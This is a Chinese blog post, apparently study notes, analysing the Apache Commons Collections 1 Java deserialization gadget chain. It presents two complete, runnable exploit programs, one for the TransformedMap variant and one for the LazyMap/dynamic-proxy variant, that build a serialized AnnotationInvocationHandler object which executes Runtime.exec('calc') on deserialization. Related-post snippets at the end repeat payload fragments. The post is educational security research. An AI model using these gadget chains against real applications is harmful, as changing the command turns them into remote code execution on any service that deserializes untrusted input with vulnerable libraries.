CommonCollections1链 分析

已于 2023-07-30 16:00:24 修改
阅读量94 收藏
点赞数
分类专栏: JAVA 文章标签: java 安全 网络安全
于 2023-07-22 14:10:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35782055/article/details/131859055
版权

本文记录java安全cc链的学习

TransformedMap

首先要知道一些用到的类和接口
Transformer接口

在这里插入图片描述
里面有一个待实现的transform方法

InvokerTransformer 相当于重新实现了一个反射
在这里插入图片描述
在这里插入图片描述
比如这样可以弹计算器
在这里插入图片描述

ChainedTransformer
在这里插入图片描述
需要传一个Transformer数组
在其transform方法中可以按数组顺序逐一带入
ConstantTransformer
不管接收什么都返回一个常量 在构造函数赋值
TransformedMap
在这里插入图片描述
接收一个map两个Transformer
在这里插入图片描述

分析过程

我们最终想调用invokerTransformer的transform方法
那我们就要找谁调用了transform
在这里插入图片描述
这里考虑TransformedMap
在这里插入图片描述
然后看valueTransform是怎么来的
之前在看相关类的时候已经知道了 有一个Protected的构造函数 这里通过decorate方法得到的
在这里插入图片描述

那么我们先就如上的链子试试能不能连上

继续跟链子

我们发现AbstractInputCheckedMapDecorator类中的MapEntry类的setValue方法调用了checkSetValue
TransformedMap继承AbstractInputCheckedMapDecorator
在这里插入图片描述
所以我们只需要遍历map就可以进setValue
在这里插入图片描述
现在变成了 我们需要找到 一个地方遍历数组并调用了setValue
然后发现AnnotationInvocationHandler类中的readObject方法直接有调用setValue

在这里插入图片描述继续观察 要想执行到setValue还需要一定的条件
在这里插入图片描述

首先是memberType非空
然后判断value是否是memberType的实例
并且我们知道Runtime是没有基础Serializable接口的我们需要用反射去拿Runtime的对象

我们先考虑Runtime的问题,需要反射
拿InvokerTransformer实现就是这样

        Method getRuntimeMethod = (Method) new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null})
                .transform(Runtime.class);
        Runtime r = (Runtime) new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[]{Runtime.class,null}).transform(getRuntimeMethod);
        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(r);

看起来很繁琐 我们可以用之前提到的ChainedTransformer来包裹
也就是这样

        Transformer[] transformers = new Transformer[]{
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null})
                ,new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[]{null,null})
                ,new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        chainedTransformer.transform(Runtime.class);

在这里插入图片描述
然后解决memberType的问题 首先是注解必须要有属性 然后map的key得是属性名
我们可以考虑用Target注解的value

可以顺利进语句
现在我们只需要想办法控制setValue中的数据就可以了
考虑开始说的ConstantTransformerRuntime.class传给他就行
于是整个链子代码如下

package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;

public class App 
{
    public static void main(String[] args) throws Exception {


        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class)
                ,new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null})
                ,new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[]{null,null})
                ,new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
//        chainedTransformer.transform(Runtime.class);

        HashMap<String, Object> hashMap = new HashMap<>();
        hashMap.put("value","value");
        Map<Object,Object> decoratedMap = TransformedMap.decorate(hashMap, null, chainedTransformer);

        Constructor constructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler")
                .getDeclaredConstructor(Class.class, Map.class);
        constructor.setAccessible(true);
        Object obj = constructor.newInstance(Target.class,decoratedMap);
        serialize(obj);
        unSerialize("ser.bin");
    }
    public static void serialize(Object object) throws Exception{
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(object);
    }
    public static Object unSerialize(String path) throws Exception{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(path));
        return ois.readObject();
    }
}

lazyMap

上面那个是一个版本 还有一个版本是基于lazyMap的
前面都一样 就TransformedMap改成了LazyMap
我们发现invoke方法中调用了get方法
所以我们需要一个动态代理类去代理AnnotationInvocationHandler类 然后调用任意方法 就可以执行invoke方法

在这里插入图片描述
要确保执行到memberValues.get我们不能调有参方法
然后只要memberValuesLazyMap的代理类就行
刚好 AnnotationInvocationHandler 实现了 InvocationHandler 在这里插入图片描述
那么现在的问题就是找无参方法 在这里插入图片描述
entrySet就很好
于是链子如下

package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;

public class App 
{
    public static void main(String[] args) throws Exception {

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class)
                ,new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null})
                ,new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[]{null,null})
                ,new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        Constructor annotationInvocationHandlerConstructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler")
                .getDeclaredConstructor(Class.class, Map.class);
        annotationInvocationHandlerConstructor.setAccessible(true);



        HashMap<String, Object> hashMap = new HashMap<>();

        LazyMap lzMap = (LazyMap) LazyMap.decorate(hashMap,chainedTransformer);
        InvocationHandler lzInvocationHandler = (InvocationHandler) annotationInvocationHandlerConstructor.newInstance(Override.class, lzMap);
        Map proxyLazyMap = (Map) Proxy.newProxyInstance(lzMap.getClass().getClassLoader(), lzMap.getClass().getInterfaces(), lzInvocationHandler);

        Object obj = annotationInvocationHandlerConstructor.newInstance(Override.class, proxyLazyMap);
        
        serialize(obj);
        unSerialize("ser.bin");
    }
    public static void serialize(Object object) throws Exception{
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(object);
    }
    public static Object unSerialize(String path) throws Exception{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(path));
        return ois.readObject();
    }
}

这里在反序列化的时候会抛ClassCastException的异常 不过不影响执行

丨Arcueid丨
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java反序列化3-CommonsCollections1利用分析
weixin_43263451的博客
07-06 319
本文分析的是yso中CommonCollections1的payload,其payload前半段前文已经分析过,重点是对后半段的讲解。上一节的payload是利用TransformedMap来完成CommonsCollections的利用的(当调用put方法时会调用transform方法)这次没有利用TransformedMap,而是利用LazyMap来完成CommonsCollections的利用,其中还涉及到了动态代理,该payload稍微麻烦了一点。调用图示:https://blog.csdn.
CommonCollections1反序列化利用分析
道阻且长,行则将至。
07-30 1216
文章目录前言CC1利用CC1环境部署Java命令执行 前言 在前面的文章 JAVA代码审计之Shiro反序列化漏洞分析 中介绍了 Java 反序列化漏洞原理、并通过 IDEA 动态调试分析了 CVE-2016-4437 Apache Shiro 反序列化漏洞的程序存在可被用户控制的序列化数值的形成( RememberMe 字段使用的 Cookie = Base64(AES(Serializable(用户ID))))。 反序列化漏洞的成因在于应用程序把其他格式的数据(如字节流,XML 数据、JSON 格
CommonCollections6分析
Demodd的博客
03-20 4223
前言 ​ 本文参考b站白日梦组长仅做笔记记录,完全跟着他复现,大家可以参考他的视频学习。 Gadget分析 因为只看了cc1可以说cc6利用的是cc1的前半部分,一直到LazyMap.decorate Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("get
CommonCollections5分析
Demodd的博客
03-20 4682
前言 ​ 本文直接跟着前面文章写了,没有描述前部分poc的内容 正文 看一下cc5的Gadget Gadget chain: ObjectInputStream.readObject() BadAttributeValueExpException.readObject() TiedMapEntry.toString() LazyMap.get() Chaine
CommonCollections1 TransforedMap分析
Demodd的博客
03-15 1178
CommonCollections1 TransforedMap分析 文章首发地址SecIN https://www.sec-in.com/article/1592 普通的代码执行 Runtime.getRuntime().exec("calc"); java反射的代码执行 Runtime runtime = Runtime.getRuntime(); Class c = Runtime.class; Method execMethod = c.getMethod("exec",String.clas
Java反序列化2-CommonCollections利用分析
weixin_43263451的博客
07-01 1085
首先这篇文章不是出自yso中cc1的payload,该篇利用的是TransformedMap。以下是主要的参考文章汇总:https://www.yuque.com/tianxiadamutou/zcfd4v/hsh32p#3b11f6b6https://xz.aliyun.com/t/7031#toc-8p牛-代码审计-Java漫谈首先我会分析POC的核心代码,然后讲解为什么其他方式不行,最后为了提高漏洞利用的普适程度,引出POC的全部代码。总体思路: 0x01 实验环境 本次的实验环境是jdk1.7的7u
JAVA反序列化之CommonCollections1利用
lt_xiaodou的博客
08-30 344
看到这里,是否有一种豁然开朗的感觉?到这里相信大家对上面的Demo原理已经了解了,但是现在有一个问题,我们在本机执行是可以执行代码了,但是怎么反序列化漏洞中来利用这个利用呢?通过上面的调用总结可以看出,这一套调用主要是围绕着Transformer接口的transform方法的,所以说要找到一个在readObject方法中能调用transform方法的地方。整篇文章总体思路是跟着P牛的文章思路来的,只不过因为基础薄弱很多地方都详细分析了一遍。...
CommonCollections3分析
arcuied
08-09 145
CommonCollections3分析
commons-collections1(cc1)反序列化分析
遇事不决冲冲冲
01-30 5153
commons-collections1也就是常说的cc1,网上一般有两条子,一个就是ysoserial中的lazymap,还有transformedmap,刚开始碰到cc1子感觉有点麻烦,但只要迈出第一步后面就会挺流畅的,首先在细跟之前一定要有一个大的框架,哪一步完了再跟进到哪一步,像cc1这里主要就是Transformer接口里三个主要的实现类来实现命令执行,然后通过两个不同方法调用执行,即可!
Java反序列化(四)Common Collection 2分析
Vicl1fe的博客
05-23 542
前言 环境 jdk 1.7 Commons Collections 4.0 idea idea创建maven项目,在pom.xml添加即可 <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-collections4</artifactId> <version>4.0</version> </depen
CommonsCollections1利用分析
m0_61506558的博客
11-14 408
总结以图解的方式回顾一下整条的利用:第一条:从开始;调用 TransformedMap类从其父类继承回来的setValue()方法;然后调用了自身的方法;该方法调用传入的Transformer类的方法;
通过Apaache Common-collections分析Java反序列化
qq_43578872的博客
09-18 155
通过Apaache Common-collections分析Java反序列化 前言 本文将通过 Apache Commons-collections爆出的反序列化漏洞来作为例子进行原理分析。 漏洞成因 在这个Java反序列化漏洞的利用主要由三个部分组成 1、可以执行恶意代码的对象(在这个例子中即为Commons-collection中的Transformer类) 2、一个被恶意对象“寄生的宿主”,通俗的来说就是,宿主对象反序列化的时候因为需要执行readObject方法,而readObject方法在可以被
CommonCollection1反序列化学习
xuhss_com的博客
04-01 541
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 CommonsCollection1 1、前置知识 1.1、反射基础知识 1.1.1、 对象与类的基础知识 类(class),对象(object) 对象是类的实例化,中华田园犬(object)是狗(class)的实例化 类是对象的抽象化,狗(class)是中华田园犬(objec
Java基础(6)- Java代码笔记3
最新发布
weixin_47062560的博客
08-30 468
数据类型[][] 数组名 = new 数据类型[m][n]数据类型 数组名[][] = new 数据类型[m][n]数据类型[] 数组名[] = new 数据类型[m][n]m:代表二维数组长度n:代表二维数组中每个一维数组的长度。
启动Application 报错:no mapping for GET /(已解决)
qq_3512323979的博客
08-26 5489
no mapping for GET /因为我使用的是框架嘛,然后生成了一个SpringBoot项目后,resources下面就会有一个static的类,用于存放静态资源类,后面我把静态资源放在里面,但是启动启动类后,报错一直匹配不到。: 正常的话,我们使用SpringBoot框架,他会给我们提供许多便利,包括静态资源的自动服务,默认的话,他会去。报这个错可能还有其他原因,我的是因为这个,大家可以根据日志信息一步步检查,肯定可以解决的!类并覆盖其方法时,就会失去静态资源的自动服务
[C++规范] 访问类成员变量的方式:直接访问还是通过成员函数访问?
Loewen丶的小窝
08-26 5707
在面向对象编程(OOP)中,通过成员函数(如`ME_HardwareTypeEnum Type() const;` 和 `int Id() const;`)来访问类的私有或受保护成员(如`m_hardwareType` 和 `m_id`),而不是直接通过公共成员访问,是一种更好的做法。
操作系统原子操作
zzt_is_me的博客
08-28 3628
所谓的原子操作就是不可被拆分的操作,对于多线程对全局变量进行操作时,就再也不用再线程锁了,和pthread_mutex_t保护作用是一样的,也是线程安全的,有些编译器在使用时需要加-march=i686编译参数。2、type只能是整数相关的类型,浮点型和自定义类型无法使用。功能:把value赋值给*ptr,并返回*ptr的旧值。功能:以上操作返回的是*ptr与value计算后的值。使用原子操作实现一个线程安全的无锁队列。1、该功能并不通用,有些编译器不支持。功能:以上操作返回的是*ptr的旧值。
Spring WebFlux – CVE-2023-34034 – 撰写和概念验证
技术超强的网络安全平台
08-28 2285
Spring框架是一个广泛使用的基于Java的应用程序框架,为企业级Java应用的开发提供基础设施支持。是一个功能强大的身份验证和访问控制框架,也是保护基于 Spring 的应用程序的行业标准。它提供身份验证和授权,并且可以轻松扩展以满足自定义要求。Spring WebFlux是在 Spring 5 中引入的,作为传统框架的响应式编程替代方案。Spring WebFlux 的核心设计旨在处理异步、非阻塞和反应式编程范例。它提供了一种反应式编程模型,允许开发人员构建可扩展、响应迅速且具有弹性的应用程序。
Collections.singletonList(1)
03-17
Collections.singletonList(1)是Java中的一个方法,它返回一个只包含一个变列表。该方法接受一个参数,将其作为列表中的唯一元素。在这种情况下,参数是整数1。 这个方法的作用是创建一个只包含一个元素的列表,这个列表不能被修改。这在某些情况下非常有用,例如当你需要将一个单独的元素传递给一个期望接收列表作为参数的方法时。 注意,由于返回的列表是不可变的,任何对它进行修改的尝试都会导致UnsupportedOperationException异常。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值